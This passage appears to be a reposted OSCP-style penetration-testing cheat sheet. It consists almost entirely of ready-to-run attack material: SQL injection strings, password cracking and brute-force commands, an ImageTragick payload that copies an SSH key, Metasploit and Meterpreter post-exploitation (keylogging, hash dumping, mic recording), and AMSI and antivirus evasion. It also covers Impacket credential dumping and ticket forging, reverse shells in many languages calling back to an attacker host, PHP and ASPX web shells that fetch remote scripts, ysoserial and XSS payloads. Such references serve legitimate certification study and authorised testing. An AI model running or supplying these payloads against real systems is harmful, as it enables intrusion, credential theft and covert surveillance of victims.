test' or 1=1 or 'a'='a test' or 1=2 or 'a'='a 'or substring(Password,1,1)='p' or' # checking letter "p" on the beginning of the password 'or substring(Password,2,1)='p' or' # checking letter "p" on the second position of the password
Password Attacks
fcrack
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <FILE>.zip
LaZagne
laZagne.exe all
Hydra
export HYDRA_PROXY=connect://127.0.0.1:8080 unset HYDRA_PROXY hydra <RHOST> http-form-post "/otrs/index.pl:Action=Login&RequestedURL=Action=Admin&User=root@localhost&Password=^PASS^:Login failed" -l root@localhost -P otrs-cewl.txt -vV -f hydra -l admin -P /usr/share/wordlists/rockyou.txt <RHOST> http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=COOKIE_1&__EVENTVALIDATION=COOKIE_2&UserName=^USER^&Password=^PASS^&LoginButton=Log+in:Login failed"
John
/usr/share/john/ssh2john.py id_rsa > hash john hash --wordlist=/usr/share/wordlists/rockyou.txt <FILE> john --rules --wordlist=/usr/share/wordlists/rockyou.txt <FILE> john --show <FILE>
Exploitation Tools
ImageTragick Polyglot Attack
poc.svg <image authenticate='ff" `echo $(cat /home/<USERNAME>/.ssh/id_rsa)> /dev/shm/id_rsa`;"'> <read filename="pdf:/etc/passwd"/> <get width="base-width" height="base-height" /> <resize geometry="400x400" /> <write filename="test.png" /> <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <image xlink:href="msl:poc.svg" height="100" width="100"/> </svg> </image> $ convert poc.svg poc.png
Metasploit
General Usage
sudo msfdb init // database initialization msf6 > search // search within metasploit msf6 > set RHOST <RHOST> // set remote host msf6 > set RPORT <RPORT> // set remote port msf6 > run // run exploit msf6 > spool /PATH/TO/FILE // recording screen output msf6 > save // saves current state msf6 > exploit // using module exploit msf6 > payload // using module payload msf6 > auxiliary // using module auxiliary msf6 > encoder // using module encoder msf6 > nop // using module nop msf6 > show sessions // displays all current sessions msf6 > sessions -i 1 // switch to session 1 msf6 > db_nmap -sC <RHOST> // using nmap msf6 > jobs // showing all current jobs msf6 > hosts // displaying hosts msf6 > services // displaying services msf6 > vulns // displaying vulnerabilities msf6 > show payloads // displaying available payloads msf6 > set VERBOSE true // enable verbose output msf6 > set forceexploit true // exploits the target anyways msf6 > use post/multi/manage/shell_to_meterpreter // shell to meterpreter msf6 > use exploit/windows/http/oracle_event_processing_upload // use a specific module C:\> > Ctrl + z // put active meterpreter shell in background meterpreter > background // put meterpreter in background (same as "bg") meterpreter > shell // get a system shell meterpreter > channel -i <ID> // get back to existing meterpreter shell meterpreter > ps // checking processes meterpreter > migrate 2236 // migrate to a process meterpreter > getuid // get the user id meterpreter > sysinfo // get system information meterpreter > upload // uploading local files to the target meterpreter > ipconfig // get network configuration meterpreter > load kiwi // load mimikatz meterpreter > getprivs // get privileges after loading mimikatz meterpreter > getsystem // gain system privileges if user is member of administrator group meterpreter > hashdump // dumps all the user hashes meterpreter > run post/windows/gather/checkvm // check status of the target meterpreter > run post/multi/recon/local_exploit_suggester // checking for exploits meterpreter > run post/windows/manage/enable_rdp // enables rdp meterpreter > run post/multi/manage/autoroute // runs autoroutes meterpreter > run auxiliary/server/socks4a // runs socks4 proxy server meterpreter > keyscan_start // enabled keylogger meterpreter > keyscan_dump // showing the output meterpreter > screenshare // realtime screen sharing meterpreter > screenshare -q 100 // realtime screen sharing meterpreter > record_mic // recording mic output meterpreter > timestomp // modify timestamps meterpreter > execute -f calc.exe // starts a program on the victim meterpreter > portfwd add -l <LPORT> -p <RPORT> -r 127.0.0.1 // port forwarding
Metasploit through Proxychains
proxychains -q msfconsole
Meterpreter Listener
Generate Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter_payload.exe
Setup Listener for Microsoft Windows
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST <LHOST> LHOST => <LHOST> msf6 exploit(multi/handler) > set LPORT <LPORT> LPORT => <LPORT> msf6 exploit(multi/handler) > run
Download Files
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o <FILE>exe
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST <LHOST> LHOST => <LHOST> msf6 exploit(multi/handler) > set LPORT <LPORT> LPORT => <LPORT> msf6 exploit(multi/handler) > run
C:\> .\<FILE>.exe
meterpreter > download *
Enumeration
SNMP Scan
msf6 > use auxiliary/scanner/snmp/snmp_login msf6 auxiliary(scanner/snmp/snmp_login) > set RHOSTS <RHOST> msf6 auxiliary(scanner/snmp/snmp_login) > run
SNMP Enum
msf6 > use auxiliary/scanner/snmp/snmp_enum msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS <RHOST> msf6 auxiliary(scanner/snmp/snmp_enum) > run
Tomcat Enumeration
msf6 > use auxiliary/scanner/http/tomcat_mgr_login msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS <RHOST> msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
Exploit Suggester
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf6 post(multi/recon/local_exploit_suggester) > set session 1 msf6 post(multi/recon/local_exploit_suggester) > run
Auxiliary Handling
Auxiliary Setup
msf6 > use auxiliary/scanner/http/tvt_nvms_traversal msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS <RHOST> msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set FILEPATH Users/Nathan/Desktop/Passwords.txt msf6 auxiliary(scanner/http/tvt_nvms_traversal) > run
Auxiliary Output Directory
/home/kali/.msf4/loot/20200623090635_default_<RHOST>_nvms.traversal_680948.txt
ShellShock
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1' http://<RHOST>/cgi-bin/user.sh
Post Exploitation
AMSI
Test String
PS C:\> $str = 'amsiinitfailed'
Bypass
PS C:\> $str = 'ams' + 'ii' + 'nitf' + 'ailed'
AppLocker Bypass List
Bypass List (Windows 10 Build 1803): C:\Windows\Tasks C:\Windows\Temp C:\windows\tracing C:\Windows\Registration\CRMLog C:\Windows\System32\FxsTmp C:\Windows\System32\com\dmp C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys C:\Windows\System32\spool\PRINTERS C:\Windows\System32\spool\SERVERS C:\Windows\System32\spool\drivers\color C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10) C:\Windows\SysWOW64\FxsTmp C:\Windows\SysWOW64\com\dmp C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
autologon
powershell -c "$SecPass = Convertto-securestring 'Welcome1!' -AsPlainText -Force;$cred=New-Object System.Management.Automation.PScredential('administrator', $SecPass);Start-Process -FilePath 'C:\Users\Public\Downloads\nc.exe' -argumentlist '-e cmd <LHOST> <LPORT>' -Credential $cred"
Bash Privilege Escalation
sudo -u#-1 /bin/bash
Basic Linux Enumeration
id sudo -l uname -a cat /etc/hosts cat /etc/fstab cat /etc/passwd ss -tulpn ps -auxf ls -lahv ls -R /home
Basic Windows Enumeration
systeminfo whoami /all net users net users <USERNAME>
Evil-WinRM
sudo ruby /usr/local/bin/evil-winrm -i <RHOST> -u <USERNAME> -p <PASSWORD>
find Commands
find ./ -type f -exec grep --color=always -i -I 'password' {} \; find / -group <group> 2>/dev/null find / -user <USERNAME> 2>/dev/null find / -user <USERNAME> -ls 2>/dev/null find / -user <USERNAME> 2>/dev/null | grep -v proc 2>/dev/null find / -user <USERNAME> -ls 2>/dev/null | grep -v proc 2>/dev/null find / -perm -4000 2>/dev/null find / -perm -4000 2>/dev/null | xargs ls -la find / -type f -user root -perm -4000 2>/dev/null
grep for Passwords
grep -R db_passwd grep -roiE "password.{20}" grep -oiE "password.{20}" /etc/*.conf
Impacket
impacket-smbserver local . -smb2support impacket-reg <RHOST>/<USERNAME>:<PASSWORD:PASSWORD_HASH>@<RHOST> <ACTION> <ACTION> impacket-services <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> <ACTION> impacket-netview <RHOST>/<USERNAME> -targets /PATH/TO/FILE/<FILE>.txt -users /PATH/TO/FILE/<FILE>.txt impacket-lookupsid <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> impacket-GetADUsers -all -dc-ip <RHOST> <RHOST>/ impacket-getST <RHOST>/<USERNAME> -spn WWW/<DOMAIN_CONTROLLER>.<RHOST> -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator impacket-rpcdump <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> impacket-samrdump <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> impacket-atexec -k -no-pass <RHOST>/Administrator@<DOMAIN_CONTROLLER>.<RHOST> 'type C:\PATH\TO\FILE\<FILE>'
impacket-smbclient
export KRB5CCNAME=<USERNAME>.ccache impacket-smbclient <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> impacket-smbclient -k <RHOST>/<USERNAME>@<RHOST>.<RHOST> -no-pass
impacket-getTGT
impacket-getTGT <RHOST>/<USERNAME>:<PASSWORD> impacket-getTGT <RHOST>/<USERNAME> -dc-ip <RHOST> -hashes aad3b435b51404eeaad3b435b51404ee:7c662956a4a0486a80fbb2403c5a9c2c
impacket-GetNPUsers
impacket-GetNPUsers <RHOST>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast impacket-GetNPUsers <RHOST>/<USERNAME> -request -no-pass -dc-ip <RHOST> impacket-GetNPUsers <RHOST>/ -usersfile usernames.txt -format john -outputfile hashes
impacket-getUserSPNs / GetUserSPNs.py
export KRB5CCNAME=<USERNAME>.ccache impacket-GetUserSPNs <RHOST>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<RHOST> -no-pass -request ./GetUserSPNs.py <RHOST>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<RHOST> -no-pass -request
impacket-secretsdump
export KRB5CCNAME=<USERNAME>.ccache impacket-secretsdump <RHOST>/<USERNAME>@<RHOST> impacket-secretsdump -k <RHOST>/<USERNAME>@<RHOST>.<RHOST> -no-pass -debug impacket-secretsdump -ntds ndts.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash impacket-secretsdump -dc-ip <RHOST> <RHOST>.LOCAL/svc_bes:<PASSWORD>@<RHOST> impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
impacket-psexec
impacket-psexec <USERNAME>@<RHOST> impacket-psexec <RHOST>/administrator@<RHOST> -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
impacket-ticketer
Requirements
- Valid User
- NTHASH
- Domain-SID
export KRB5CCNAME=<USERNAME>.ccache impacket-ticketer -nthash C1929E1263DDFF6A2BCC6E053E705F78 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain <RHOST> -spn MSSQLSVC/<RHOST>.<RHOST> -user-id 500 Administrator
Fixing [-] exceptions must derive from BaseException
Issue:
./GetUserSPNs.py <RHOST>/<USERNAME>:<PASSWORD> -k -dc-ip <DOMAIN_CONTROLLER>.<RHOST> -no-pass -request Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [-] exceptions must derive from BaseException
How to fix it:
241 if self.__doKerberos: 242 #target = self.getMachineName() 243 target = self.__kdcHost
Juicy Potato
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -b "\x00\x0a" -a x86 --platform windows -f exe -o exploit.exe msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST <LHOST> msf6 exploit(multi/handler) > set LPORT <LHOST> msf6 exploit(multi/handler) > run .\exploit.exe
PowerShell
General Usage
Allow Script Execution
PS C:\> set-executionpolicy remotesigned PS C:\> Set-ExecutionPolicy unrestricted
Script Execution Bypass
PS C:\> powershell.exe -noprofile -executionpolicy bypass -file .\<FILE>.ps1
Import Module to PowerShell cmdlet
PS C:\> import-module ./<module / powershell script>
Check PowerShell Versions
PS Set-ExecutionPolicy Unrestricted PS powershell -Command "$PSVersionTable.PSVersion" PS powershell -c "[Environment]::Is64BitProcess"
Start offsec Session
PS /home/kali> $offsec_session = New-PSSession -ComputerName <RHOST> -Authentication Negotiate -Credential <USERNAME> PS /home/kali> Enter-PSSession $offsec_session
PSCredential
Import-CliXml Export-CliXml
PS C:\> powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
AntiVirus Handling
AntiVirus Bypass for Invoke-Expression (IEX)
PS C:\> <COMMAND> | & ( $PsHOme[4]+$PShoMe[30]+'x')
Explaination
$PSHome[4] // equals "i" $PSHome[30] // equals "e" +x // adds an "x"
Alternative
PS C:\> $eNV:COmSPeC[4,15,25]-JOiN''
Explaination
$eNV:COmSPeC[4] // equals "i" $eNV:COmSPeC[15] // equals "e" $eNV:COmSPeC[25} // equals "x"
System
Show current User
PS C:\> whoami /all PS C:\> getuserid
Show Groups
PS C:\> whoami /groups
Get System Information
PS C:\> systeminfo
Get Process List
PS C:\> Get-Process
Get net user Information
PS C:\> net users PS C:\> net users <USERNAME>
Get User List
PS C:\> Get-ADUser -Filter * -SearchBase "DC=<RHOST>,DC=LOCAL"
Invoke-Expression File Transfer
PS C:\> IEX(IWR http://<LHOST>/<FILE>.ps1) -UseBasicParsing)
Add new Domain Administrator
PS C:\> $PASSWORD= ConvertTo-SecureString –AsPlainText -Force -String <PASSWORD> PS C:\> New-ADUser -Name "<USERNAME>" -Description "<DESCRIPTION>" -Enabled $true -AccountPassword $PASSWORD PS C:\> Add-ADGroupMember -Identity "Domain Admins" -Member <USERNAME>
Execute Commands in User Context
PS C:\> $pass = ConvertTo-SecureString "<PASSWORD>" -AsPlaintext -Force PS C:\> $cred = New-Object System.Management.Automation.PSCredential ("<DOMAIN>\<USERNAME>", $pass) PS C:\> Invoke-Command -computername <COMPUTERNAME> -ConfigurationName dc_manage -credential $cred -command {whoami}
Execute Scripts with Credentials (Reverse Shell)
PS C:\Windows\system32> $pass = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force PS C:\Windows\system32> $cred = New-Object System.Management.Automation.PSCredential("<DOMAIN>\<USERNAME>", $pass) PS C:\Windows\system32> Invoke-Command -Computer <RHOST> -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://<LHOST>/<FILE>.ps1') } -Credential $cred
New-PSSession
PS C:\Users\<USERNAME>\Downloads\backups> $username = "<DOMAIN>\<USERNAME>" $username = "<DOMAIN>\<USERNAME>" PS C:\Users\<USERNAME>\Downloads\backups> $password = "<PASSWORD>" $password = "<PASSWORD>" PS C:\Users\<USERNAME>\Downloads\backups> $secstr = New-Object -TypeName System.Security.SecureString $secstr = New-Object -TypeName System.Security.SecureString PS C:\Users\<USERNAME>\Downloads\backups> $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)} $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)} PS C:\Users\<USERNAME>\Downloads\backups> $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr PS C:\Users\<USERNAME>\Downloads\backups> new-pssession -computername . -credential $cred new-pssession -computername . -credential $cred Id Name ComputerName ComputerType State ConfigurationName Availability -- ---- ------------ ------------ ----- ----------------- ------------ 1 WinRM1 localhost RemoteMachine Opened Microsoft.PowerShell Available PS C:\Users\<USERNAME>\Downloads\backups> enter-pssession 1 enter-pssession 1 [localhost]: PS C:\Users\<USERNAME>\Documents> whoami whoami <DOMAIN>\<USERNAME>
Windows Tasks & Services
tasklist /SVC netsh firewall show state schtasks /query /fo LIST /v driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
sc query sc qc <service-name> accesschk.exe -uws "Everyone" "C:\Program Files" dir /s *pass* == *cred* == *vnc* == *.config* findstr /si password *.xml *.ini *.txt wmic qfe get Caption,Description,HotFixID,InstalledOn # no new patches - KEXP pretty likely
Writeable Directories in Linux
/dev/shm /tmp
Payloads
Reverse Shells
Bash Reverse Shell
bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1' echo -n '/bin/bash -c "bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"' | base64
curl Reverse Shell
curl --header "Content-Type: application/json" --request POST http://<RHOST>:<RPORT>/upload --data '{"auth": {"name": "<USERNAME>", "password": "<PASSWORD>"}, "filename" : "& echo "bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"|base64 -d|bash"}'
JAVA Reverse Shell
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() $ r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor();
shell.jar
package <NAME>; import org.bukkit.plugin.java.JavaPlugin; import java.io.IOException; import java.nio.file.Files; import java.nio.file.Paths; import java.nio.file.StandardOpenOption; public class Main extends JavaPlugin { @Override public void onDisable() { super.onDisable(); } @Override public void onEnable() { final String PHP_CODE = "<?php system($_GET['cmd']); ?>"; try { Files.write(Paths.get("/var/www/<RHOST>/shell.php"), PHP_CODE.getBytes(), StandardOpenOption.CREATE_NEW); } catch (IOException e) { e.printStackTrace(); } super.onEnable(); } }
Lua Reverse Shell
http://<RHOST>');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT>/tmp/f")--
Markdown Reverse Shell
--';bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1;'--
mkfifo Reverse Shell
mkfifo /tmp/shell; nc <LHOST> <LPORT> 0</tmp/shell | /bin/sh >/tmp/shell 2>&1; rm /tmp/shell
Netcat Reverse Shell
nc -e /bin/sh <LHOST> <LPORT>
Perl Reverse Shell
perl -e 'use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP Reverse Shell
php -r '$sock=fsockopen("<LHOST>",<LPORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
PowerShell Reverse Shell
$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<LHOST>',<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell -nop -exec bypass -c '$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
minireverse.ps1
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413); if($socket -eq $null){exit 1} $stream = $socket.GetStream(); $writer = new-object System.IO.StreamWriter($stream); $buffer = new-object System.Byte[] 1024; $encoding = new-object System.Text.AsciiEncoding; do { $writer.Flush(); $read = $null; $res = "" while($stream.DataAvailable -or $read -eq $null) { $read = $stream.Read($buffer, 0, 1024) } $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n",""); if(!$out.equals("exit")){ $args = ""; if($out.IndexOf(' ') -gt -1){ $args = $out.substring($out.IndexOf(' ')+1); $out = $out.substring(0,$out.IndexOf(' ')); if($args.split(' ').length -gt 1){ $pinfo = New-Object System.Diagnostics.ProcessStartInfo $pinfo.FileName = "cmd.exe" $pinfo.RedirectStandardError = $true $pinfo.RedirectStandardOutput = $true $pinfo.UseShellExecute = $false $pinfo.Arguments = "/c $out $args" $p = New-Object System.Diagnostics.Process $p.StartInfo = $pinfo $p.Start() | Out-Null $p.WaitForExit() $stdout = $p.StandardOutput.ReadToEnd() $stderr = $p.StandardError.ReadToEnd() if ($p.ExitCode -ne 0) { $res = $stderr } else { $res = $stdout } } else{ $res = (&"$out" "$args") | out-string; } } else{ $res = (&"$out") | out-string; } if($res -ne $null){ $writer.WriteLine($res) } } }While (!$out.equals("exit")) $writer.close(); $socket.close(); $stream.Dispose()
Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin/su","-c","id","bynarr"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,"fruity\n");time.sleep(0.1);print os.read(master,1024);'
echo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > <FILE><(),2);p=subprocess.call(["/bin/sh","-i"]);' > <FILE>
Ruby Reverse Shell
ruby -rsocket -e'f=TCPSocket.open("<LHOST>",<LPORT>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Web Shells
PHP Web Shell
<?php system($_GET['cmd']); ?> <?php echo exec($_POST['cmd']); ?> <?php echo passthru($_GET['cmd']); ?> <?php passthru($_REQUEST['cmd']); ?> <?php echo system($_REQUEST['shell']): ?>
nishang
cd path/to/nishang/Shells/ cp Invoke-PowerShellTcp.ps1 Invoke-PowerShellTcp.ps1 tail -3 Invoke-PowerShellTcp.ps1 } Invoke-PowerShellTcp -Reverse -IPAddress <LHOST> -Port <LPORT> powershell "IEX(New-Object Net.Webclient).downloadString('http://<LHOST>:<LPORT>/Invoke-PowerShellTcp.ps1')"
Shikata Ga Nai
msfvenom -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/shell.exe
ysoserial
java -jar ysoserial-master-SNAPSHOT.jar java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections1 'nc <LHOST> <LPORT> -e /bin/sh' | base64 -w 0 java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections4 "$jex" > /tmp/$filename.session
Templates
ASPX Web Shell
<?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <!-- ASP code comes here! It should not include HTML comment closing tag and double dashes! <% Set s = CreateObject("WScript.Shell") Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://<LHOST>/shellyjelly.ps1')") o = cmd.StdOut.Readall() Response.write(o) %> -->
Bad YAML
- hosts: localhost tasks: - name: badyml command: chmod +s /bin/bash
Exploit Skeleton Python Script
#!/usr/bin/python import socket,sys address = '127.0.0.1' port = 9999 buffer = #TBD try: print '[+] Sending buffer' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((address,port)) s.recv(1024) s.send(buffer + '\r\n') except: print '[!] Unable to connect to the application.' sys.exit(0) finally: s.close()
JSON POST Request
POST /<path> HTTP/1.1 Host: <RHOST> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 95 Connection: close { "auth":{ "name":"<USERNAME>", "password":"<PASSWORD>" }, "filename":"<FILE>" }
XSS
Basic Payloads
<script>alert('XSS')</script> <scr<script>ipt>alert('XSS')</scr<script>ipt> "><script>alert('XSS')</script> "><script>alert(String.fromCharCode(88,83,83))</script> <script src="http://<LHOST>/<FILE>"></script>
IMG Payloads
<img src=x onerror=alert('XSS');> <img src=x onerror=alert('XSS')// <img src=x onerror=alert(String.fromCharCode(88,83,83));> <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));> <img src=x:alert(alt) onerror=eval(src) alt=xss> "><img src=x onerror=alert('XSS');> "><img src=x onerror=alert(String.fromCharCode(88,83,83));>
SVG Payloads
<svgonload=alert(1)> <svg/onload=alert('XSS')> <svg onload=alert(1)// <svg/onload=alert(String.fromCharCode(88,83,83))> <svg id=alert(1) onload=eval(id)> "><svg/onload=alert(String.fromCharCode(88,83,83))> "><svg/onload=alert(/XSS/) <svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
DIV Payloads
<div onpointerover="alert(45)">MOVE HERE</div> <div onpointerdown="alert(45)">MOVE HERE</div> <div onpointerenter="alert(45)">MOVE HERE</div> <div onpointerleave="alert(45)">MOVE HERE</div> <div onpointermove="alert(45)">MOVE HERE</div> <div onpointerout="alert(45)">MOVE HERE</div> <div onpointerup="alert(45)">MOVE HERE</div>
The OSCP Guide is a github repository by 0xsry0
Leave a Reply